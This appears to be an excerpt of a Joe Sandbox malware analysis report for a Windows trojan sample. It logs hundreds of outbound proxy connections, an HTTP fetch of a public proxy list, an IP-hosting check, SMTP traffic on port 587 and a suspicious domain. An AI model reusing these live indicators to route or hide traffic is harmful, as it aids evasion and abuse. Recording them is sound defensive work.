                      Source: global trafficTCP traffic: 192.168.2.8:50009 -> 116.212.144.223:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50011 -> 190.82.105.123:43949
                      Source: global trafficTCP traffic: 192.168.2.8:50012 -> 195.90.216.75:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50013 -> 103.5.127.213:50806
                      Source: global trafficTCP traffic: 192.168.2.8:50014 -> 115.171.217.48:7890
                      Source: global trafficTCP traffic: 192.168.2.8:50015 -> 37.120.222.132:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50016 -> 149.102.148.170:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50019 -> 91.150.189.122:30389
                      Source: global trafficTCP traffic: 192.168.2.8:50020 -> 88.255.64.91:1976
                      Source: global trafficTCP traffic: 192.168.2.8:50021 -> 150.136.120.240:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50023 -> 46.48.126.226:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50026 -> 72.10.160.171:8459
                      Source: global trafficTCP traffic: 192.168.2.8:50028 -> 103.191.196.44:8082
                      Source: global trafficTCP traffic: 192.168.2.8:50029 -> 103.216.50.11:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50030 -> 37.52.13.164:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50031 -> 148.66.130.187:60083
                      Source: global trafficTCP traffic: 192.168.2.8:50032 -> 45.7.210.203:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50033 -> 209.126.104.38:21525
                      Source: global trafficTCP traffic: 192.168.2.8:50034 -> 186.103.130.93:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50036 -> 162.0.220.222:53242
                      Source: global trafficTCP traffic: 192.168.2.8:50037 -> 45.126.168.178:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50039 -> 197.232.65.40:55443
                      Source: global trafficTCP traffic: 192.168.2.8:50040 -> 84.204.40.155:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50041 -> 184.178.172.5:15303
                      Source: global trafficTCP traffic: 192.168.2.8:50043 -> 5.252.23.249:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50044 -> 123.30.154.171:7777
                      Source: global trafficTCP traffic: 192.168.2.8:50045 -> 102.68.128.216:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50046 -> 203.19.38.114:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50047 -> 184.181.217.220:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50048 -> 5.161.219.13:4228
                      Source: global trafficTCP traffic: 192.168.2.8:50049 -> 198.176.54.34:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50050 -> 109.24.132.215:3131
                      Source: global trafficTCP traffic: 192.168.2.8:50051 -> 38.41.0.6:11201
                      Source: global trafficTCP traffic: 192.168.2.8:50052 -> 36.67.27.189:49524
                      Source: global trafficTCP traffic: 192.168.2.8:50053 -> 103.79.96.193:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50054 -> 27.112.78.34:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50055 -> 183.165.248.145:8089
                      Source: global trafficTCP traffic: 192.168.2.8:50057 -> 159.224.187.170:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50058 -> 92.204.135.4:44712
                      Source: global trafficTCP traffic: 192.168.2.8:50059 -> 188.255.244.9:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50060 -> 67.213.210.118:65149
                      Source: global trafficTCP traffic: 192.168.2.8:50061 -> 45.162.135.201:999
                      Source: global trafficTCP traffic: 192.168.2.8:50063 -> 104.238.111.107:30026
                      Source: global trafficTCP traffic: 192.168.2.8:50064 -> 180.131.242.221:48678
                      Source: global trafficTCP traffic: 192.168.2.8:50067 -> 154.79.250.48:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50068 -> 213.149.182.98:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50069 -> 179.49.162.133:999
                      Source: global trafficTCP traffic: 192.168.2.8:50070 -> 162.144.32.209:23847
                      Source: global trafficTCP traffic: 192.168.2.8:50071 -> 188.34.164.99:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50072 -> 91.189.177.190:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50073 -> 36.95.102.111:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50074 -> 1.20.95.95:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50075 -> 162.214.67.122:2604
                      Source: global trafficTCP traffic: 192.168.2.8:50076 -> 125.25.40.38:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50079 -> 67.43.236.20:20695
                      Source: global trafficTCP traffic: 192.168.2.8:50080 -> 181.65.169.35:999
                      Source: global trafficTCP traffic: 192.168.2.8:50081 -> 107.180.101.18:38117
                      Source: global trafficTCP traffic: 192.168.2.8:50082 -> 97.79.238.253:5699
                      Source: global trafficTCP traffic: 192.168.2.8:50083 -> 154.202.117.155:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50084 -> 173.212.240.168:39180
                      Source: global trafficTCP traffic: 192.168.2.8:50087 -> 60.215.109.34:7302
                      Source: global trafficTCP traffic: 192.168.2.8:50088 -> 43.128.155.154:15673
                      Source: global trafficTCP traffic: 192.168.2.8:50089 -> 46.209.54.102:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50090 -> 159.203.137.249:30433
                      Source: global trafficTCP traffic: 192.168.2.8:50091 -> 36.37.81.135:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50092 -> 139.59.149.137:32326
                      Source: global trafficTCP traffic: 192.168.2.8:50093 -> 173.44.141.179:2006
                      Source: global trafficTCP traffic: 192.168.2.8:50094 -> 77.46.138.49:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50095 -> 37.193.227.108:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50096 -> 70.186.128.126:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50097 -> 58.240.192.158:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50099 -> 41.65.236.57:1976
                      Source: global trafficTCP traffic: 192.168.2.8:50102 -> 136.243.245.231:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50103 -> 45.136.197.139:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50104 -> 178.249.218.34:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50105 -> 176.113.73.99:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50106 -> 85.133.190.4:8099
                      Source: global trafficTCP traffic: 192.168.2.8:50107 -> 124.158.182.34:7654
                      Source: global trafficTCP traffic: 192.168.2.8:50108 -> 114.106.135.102:8089
                      Source: global trafficTCP traffic: 192.168.2.8:50109 -> 45.238.220.1:8181
                      Source: global trafficTCP traffic: 192.168.2.8:50110 -> 143.42.194.37:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50113 -> 177.184.67.77:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50114 -> 71.19.249.97:8443
                      Source: global trafficTCP traffic: 192.168.2.8:50115 -> 45.79.191.205:55919
                      Source: global trafficTCP traffic: 192.168.2.8:50116 -> 212.42.99.22:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50119 -> 103.47.93.25:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50120 -> 189.240.60.166:9090
                      Source: global trafficTCP traffic: 192.168.2.8:50121 -> 183.89.45.167:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50124 -> 41.160.238.106:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50125 -> 181.212.41.171:999
                      Source: global trafficTCP traffic: 192.168.2.8:50126 -> 112.78.170.251:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50127 -> 60.199.29.42:8111
                      Source: global trafficTCP traffic: 192.168.2.8:50129 -> 161.97.170.209:4441
                      Source: global trafficTCP traffic: 192.168.2.8:50130 -> 109.92.133.194:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50133 -> 93.100.123.135:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50134 -> 202.6.224.51:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50136 -> 103.167.15.208:84
                      Source: global trafficTCP traffic: 192.168.2.8:50137 -> 103.140.34.61:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50138 -> 209.216.90.208:31470
                      Source: global trafficTCP traffic: 192.168.2.8:50140 -> 38.41.53.144:9090
                      Source: global trafficTCP traffic: 192.168.2.8:50141 -> 78.189.191.184:48425
                      Source: global trafficTCP traffic: 192.168.2.8:50143 -> 175.106.10.227:7878
                      Source: global trafficTCP traffic: 192.168.2.8:50144 -> 8.210.60.44:5002
                      Source: global trafficTCP traffic: 192.168.2.8:50146 -> 43.128.232.224:31993
                      Source: global trafficTCP traffic: 192.168.2.8:50147 -> 108.61.168.184:44722
                      Source: global trafficTCP traffic: 192.168.2.8:50148 -> 51.159.0.236:2020
                      Source: global trafficTCP traffic: 192.168.2.8:50149 -> 173.249.33.122:5640
                      Source: global trafficTCP traffic: 192.168.2.8:50150 -> 166.62.38.100:55671
                      Source: global trafficTCP traffic: 192.168.2.8:50151 -> 27.123.3.141:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50153 -> 117.160.250.163:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50154 -> 117.24.80.53:3829
                      Source: global trafficTCP traffic: 192.168.2.8:50155 -> 82.65.98.35:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50156 -> 82.194.133.209:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50158 -> 171.244.140.160:56076
                      Source: global trafficTCP traffic: 192.168.2.8:50159 -> 103.25.210.102:347
                      Source: global trafficTCP traffic: 192.168.2.8:50161 -> 119.92.71.123:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50163 -> 162.0.220.234:53242
                      Source: global trafficTCP traffic: 192.168.2.8:50166 -> 144.24.77.90:55555
                      Source: global trafficTCP traffic: 192.168.2.8:50167 -> 177.99.160.98:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50168 -> 103.131.18.194:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50169 -> 92.246.139.112:30504
                      Source: global trafficTCP traffic: 192.168.2.8:50172 -> 5.161.98.204:53935
                      Source: global trafficTCP traffic: 192.168.2.8:50173 -> 103.118.46.176:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50174 -> 178.33.252.189:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50177 -> 103.69.87.142:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50178 -> 185.169.181.11:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50179 -> 185.16.12.137:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50180 -> 190.14.155.198:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50181 -> 54.36.108.149:56367
                      Source: global trafficTCP traffic: 192.168.2.8:50182 -> 117.69.190.52:41122
                      Source: global trafficTCP traffic: 192.168.2.8:50184 -> 152.32.238.63:38080
                      Source: global trafficTCP traffic: 192.168.2.8:50185 -> 31.172.189.205:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50188 -> 91.203.114.71:42905
                      Source: global trafficTCP traffic: 192.168.2.8:50189 -> 185.208.101.217:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50191 -> 5.78.44.6:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50193 -> 141.94.174.6:33466
                      Source: global trafficTCP traffic: 192.168.2.8:50194 -> 171.240.108.159:5306
                      Source: global trafficTCP traffic: 192.168.2.8:50195 -> 85.214.249.84:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50197 -> 190.242.126.170:999
                      Source: global trafficTCP traffic: 192.168.2.8:50198 -> 34.83.143.6:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50199 -> 24.199.86.181:8000
                      Source: global trafficTCP traffic: 192.168.2.8:50200 -> 154.239.3.185:8081
                      Source: global trafficTCP traffic: 192.168.2.8:50201 -> 54.39.50.68:44612
                      Source: global trafficTCP traffic: 192.168.2.8:50202 -> 189.29.143.202:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50203 -> 219.243.212.118:8443
                      Source: global trafficTCP traffic: 192.168.2.8:50204 -> 104.128.103.32:64312
                      Source: global trafficTCP traffic: 192.168.2.8:50205 -> 213.171.44.86:3629
                      Source: global trafficTCP traffic: 192.168.2.8:50206 -> 139.129.162.65:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50207 -> 51.15.209.188:16379
                      Source: global trafficTCP traffic: 192.168.2.8:50209 -> 169.255.198.8:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50212 -> 138.197.92.110:35982
                      Source: global trafficTCP traffic: 192.168.2.8:50215 -> 162.240.10.35:47056
                      Source: global trafficTCP traffic: 192.168.2.8:50216 -> 103.155.54.38:83
                      Source: global trafficTCP traffic: 192.168.2.8:50217 -> 173.212.209.49:44416
                      Source: global trafficTCP traffic: 192.168.2.8:50218 -> 125.228.77.228:1081
                      Source: global trafficTCP traffic: 192.168.2.8:50219 -> 20.219.177.73:3129
                      Source: global trafficTCP traffic: 192.168.2.8:50220 -> 43.251.213.62:82
                      Source: global trafficTCP traffic: 192.168.2.8:50225 -> 177.190.192.57:61221
                      Source: global trafficTCP traffic: 192.168.2.8:50227 -> 175.139.179.65:42580
                      Source: global trafficTCP traffic: 192.168.2.8:50228 -> 161.97.163.52:4085
                      Source: global trafficTCP traffic: 192.168.2.8:50229 -> 162.214.162.156:44246
                      Source: global trafficTCP traffic: 192.168.2.8:50230 -> 147.45.40.15:31554
                      Source: global trafficTCP traffic: 192.168.2.8:50231 -> 41.65.236.53:1981
                      Source: global trafficTCP traffic: 192.168.2.8:50232 -> 193.239.58.92:8081
                      Source: global trafficTCP traffic: 192.168.2.8:50234 -> 36.91.98.115:8181
                      Source: global trafficTCP traffic: 192.168.2.8:50235 -> 203.192.217.6:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50237 -> 67.43.236.19:32175
                      Source: global trafficTCP traffic: 192.168.2.8:50238 -> 38.91.106.252:11420
                      Source: global trafficTCP traffic: 192.168.2.8:50239 -> 91.247.92.63:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50240 -> 198.27.82.161:9050
                      Source: global trafficTCP traffic: 192.168.2.8:50242 -> 152.228.140.225:14719
                      Source: global trafficTCP traffic: 192.168.2.8:50243 -> 92.204.134.38:59727
                      Source: global trafficTCP traffic: 192.168.2.8:50244 -> 180.210.222.205:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50245 -> 62.171.131.101:63551
                      Source: global trafficTCP traffic: 192.168.2.8:50248 -> 162.215.223.71:38958
                      Source: global trafficTCP traffic: 192.168.2.8:50250 -> 8.242.176.37:999
                      Source: global trafficTCP traffic: 192.168.2.8:50253 -> 84.237.248.137:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50255 -> 167.99.39.82:46015
                      Source: global trafficTCP traffic: 192.168.2.8:50256 -> 103.215.139.32:20056
                      Source: global trafficTCP traffic: 192.168.2.8:50257 -> 103.109.59.193:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50258 -> 166.62.121.127:45248
                      Source: global trafficTCP traffic: 192.168.2.8:50262 -> 67.43.227.226:25639
                      Source: global trafficTCP traffic: 192.168.2.8:50263 -> 201.20.115.22:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50267 -> 65.49.82.7:40202
                      Source: global trafficTCP traffic: 192.168.2.8:50268 -> 45.90.104.150:9090
                      Source: global trafficTCP traffic: 192.168.2.8:50271 -> 155.248.213.236:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50273 -> 111.224.11.67:8089
                      Source: global trafficTCP traffic: 192.168.2.8:50274 -> 182.253.247.140:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50277 -> 88.99.148.60:8111
                      Source: global trafficTCP traffic: 192.168.2.8:50278 -> 63.151.67.7:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50279 -> 95.216.94.103:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50280 -> 222.165.223.139:41541
                      Source: global trafficTCP traffic: 192.168.2.8:50282 -> 86.107.179.234:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50283 -> 154.201.63.79:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50284 -> 163.172.144.132:16379
                      Source: global trafficTCP traffic: 192.168.2.8:50285 -> 190.2.115.33:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50287 -> 51.75.125.208:62727
                      Source: global trafficTCP traffic: 192.168.2.8:50290 -> 178.115.230.243:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50292 -> 122.53.82.126:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50295 -> 95.216.201.74:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50297 -> 45.4.202.73:999
                      Source: global trafficTCP traffic: 192.168.2.8:50299 -> 103.144.18.137:2002
                      Source: global trafficTCP traffic: 192.168.2.8:50300 -> 177.222.60.138:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50301 -> 85.187.151.27:30016
                      Source: global trafficTCP traffic: 192.168.2.8:50302 -> 37.44.238.2:52611
                      Source: global trafficTCP traffic: 192.168.2.8:50304 -> 92.205.110.47:17158
                      Source: global trafficTCP traffic: 192.168.2.8:50311 -> 207.244.252.14:62963
                      Source: global trafficTCP traffic: 192.168.2.8:50313 -> 193.31.119.180:55850
                      Source: global trafficTCP traffic: 192.168.2.8:50314 -> 181.204.27.74:999
                      Source: global trafficTCP traffic: 192.168.2.8:50316 -> 185.198.58.47:27890
                      Source: global trafficTCP traffic: 192.168.2.8:50317 -> 36.6.144.72:8089
                      Source: global trafficTCP traffic: 192.168.2.8:50319 -> 185.97.114.179:3629
                      Source: global trafficTCP traffic: 192.168.2.8:50320 -> 103.177.235.132:83
                      Source: global trafficTCP traffic: 192.168.2.8:50321 -> 138.201.21.232:48915
                      Source: global trafficTCP traffic: 192.168.2.8:50324 -> 94.23.220.136:35805
                      Source: global trafficTCP traffic: 192.168.2.8:50325 -> 222.104.128.205:48678
                      Source: global trafficTCP traffic: 192.168.2.8:50327 -> 103.35.108.198:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50326 -> 39.105.27.30:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50328 -> 51.15.21.216:63425
                      Source: global trafficTCP traffic: 192.168.2.8:50329 -> 154.236.189.15:1976
                      Source: global trafficTCP traffic: 192.168.2.8:50330 -> 178.32.143.55:32048
                      Source: global trafficTCP traffic: 192.168.2.8:50331 -> 154.202.97.98:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50332 -> 181.209.100.2:999
                      Source: global trafficTCP traffic: 192.168.2.8:50333 -> 171.244.10.204:47875
                      Source: global trafficTCP traffic: 192.168.2.8:50334 -> 162.19.7.46:49579
                      Source: global trafficTCP traffic: 192.168.2.8:50335 -> 202.162.43.241:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50338 -> 186.215.87.194:6002
                      Source: global trafficTCP traffic: 192.168.2.8:50341 -> 103.133.27.143:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50342 -> 197.235.12.130:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50343 -> 188.132.222.38:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50345 -> 51.210.4.123:58244
                      Source: global trafficTCP traffic: 192.168.2.8:50346 -> 85.173.165.36:46330
                      Source: global trafficTCP traffic: 192.168.2.8:50347 -> 202.154.36.57:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50348 -> 197.248.86.237:32650
                      Source: global trafficTCP traffic: 192.168.2.8:50349 -> 185.244.36.240:44087
                      Source: global trafficTCP traffic: 192.168.2.8:50350 -> 196.204.24.251:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50351 -> 79.143.187.58:59410
                      Source: global trafficTCP traffic: 192.168.2.8:50352 -> 43.153.133.208:15673
                      Source: global trafficTCP traffic: 192.168.2.8:50354 -> 103.221.228.50:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50356 -> 190.113.40.202:999
                      Source: global trafficTCP traffic: 192.168.2.8:50355 -> 78.140.7.239:40009
                      Source: global trafficTCP traffic: 192.168.2.8:50358 -> 193.34.237.241:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50360 -> 185.32.45.201:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50362 -> 117.160.250.138:8899
                      Source: global trafficTCP traffic: 192.168.2.8:50363 -> 43.250.81.154:34432
                      Source: global trafficTCP traffic: 192.168.2.8:50365 -> 51.222.241.8:50565
                      Source: global trafficTCP traffic: 192.168.2.8:50367 -> 103.188.177.22:8093
                      Source: global trafficTCP traffic: 192.168.2.8:50368 -> 114.106.136.163:8089
                      Source: global trafficTCP traffic: 192.168.2.8:50371 -> 54.38.179.203:60406
                      Source: global trafficTCP traffic: 192.168.2.8:50375 -> 51.255.79.114:12682
                      Source: global trafficTCP traffic: 192.168.2.8:50376 -> 196.0.111.194:48009
                      Source: global trafficTCP traffic: 192.168.2.8:50378 -> 195.178.56.37:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50379 -> 66.228.35.209:29466
                      Source: global trafficTCP traffic: 192.168.2.8:50380 -> 154.202.112.70:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50383 -> 103.14.224.104:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50382 -> 91.108.130.111:32650
                      Source: global trafficTCP traffic: 192.168.2.8:50386 -> 103.182.112.11:5000
                      Source: global trafficTCP traffic: 192.168.2.8:50387 -> 151.236.39.7:57248
                      Source: global trafficTCP traffic: 192.168.2.8:50389 -> 162.19.7.50:50847
                      Source: global trafficTCP traffic: 192.168.2.8:50390 -> 109.123.231.232:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50392 -> 185.38.111.1:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50393 -> 184.181.217.213:4145
                      Source: global trafficTCP traffic: 192.168.2.8:50394 -> 51.158.172.165:8811
                      Source: global trafficTCP traffic: 192.168.2.8:50395 -> 213.147.192.100:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50396 -> 79.101.37.78:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50397 -> 103.169.130.17:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50398 -> 188.132.221.169:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50399 -> 223.247.47.108:8089
                      Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 5.42.81.57 5.42.81.57
                      Source: Joe Sandbox ViewIP Address: 173.209.66.178 173.209.66.178
                      Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                      Source: Joe Sandbox ViewIP Address: 24.230.33.96 24.230.33.96
                      Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                      Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeDNS query: name: ip-api.com
                      Source: global trafficTCP traffic: 192.168.2.8:54070 -> 160.248.80.91:587
                      Source: global trafficTCP traffic: 192.168.2.8:55942 -> 199.188.206.65:587
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.36.13.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.207.11.148
                      Source: unknownTCP traffic detected without corresponding DNS query: 117.57.93.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.138.73.54
                      Source: unknownTCP traffic detected without corresponding DNS query: 117.54.114.103
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.56.101.184
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.43.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.255.125.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.233.78.142
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.100.6.202
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.236.124.252
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.75.117.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 115.96.208.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.40.127.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.153.252.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 201.77.108.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.83.178.42
                      Source: unknownTCP traffic detected without corresponding DNS query: 187.190.49.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 103.78.25.99
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.20.125.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.118.133.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 128.127.94.160
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.164.196.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 8.213.129.15
                      Source: unknownTCP traffic detected without corresponding DNS query: 122.52.196.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.32.15.125
                      Source: unknownTCP traffic detected without corresponding DNS query: 92.246.139.106
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.109.178.44
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.59.48.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 79.132.192.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.141.236.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.237.78
                      Source: unknownTCP traffic detected without corresponding DNS query: 82.135.123.155
                      Source: unknownTCP traffic detected without corresponding DNS query: 96.113.158.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.165.47.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.248.151.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 12.186.205.120
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.45.128.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 188.132.222.7
                      Source: unknownTCP traffic detected without corresponding DNS query: 88.132.205.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 148.72.212.212
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.146.228.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.172.159.43
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.209.207.150
                      Source: unknownTCP traffic detected without corresponding DNS query: 203.85.120.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.12.253.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 128.199.104.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 81.44.83.70
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.91.13.215
                      Source: unknownTCP traffic detected without corresponding DNS query: 47.74.152.29
                      Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: github.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 13:28:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 306Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>
